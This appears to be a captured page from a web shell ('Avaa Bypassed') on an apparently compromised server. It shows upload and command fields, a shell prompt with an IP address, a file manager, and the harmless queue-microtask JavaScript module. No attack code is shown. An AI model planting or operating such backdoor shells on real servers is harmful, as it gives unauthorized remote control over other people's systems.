404

[ Avaa Bypassed ]




Upload:

Command:

botdev@13.59.225.66: ~ $
/*! queue-microtask. MIT License. Feross Aboukhadijeh <https://feross.org/opensource> */
let promise

module.exports = typeof queueMicrotask === 'function'
  ? queueMicrotask.bind(typeof window !== 'undefined' ? window : global)
  // reuse resolved promise, and allocate it lazily
  : cb => (promise || (promise = Promise.resolve()))
    .then(cb)
    .catch(err => setTimeout(() => { throw err }, 0))

Filemanager

Name Type Size Permission Actions
LICENSE File 1.06 KB 0755
README.md File 5.5 KB 0644
index.d.ts File 79 B 0644
index.js File 402 B 0644
package.json File 1.15 KB 0644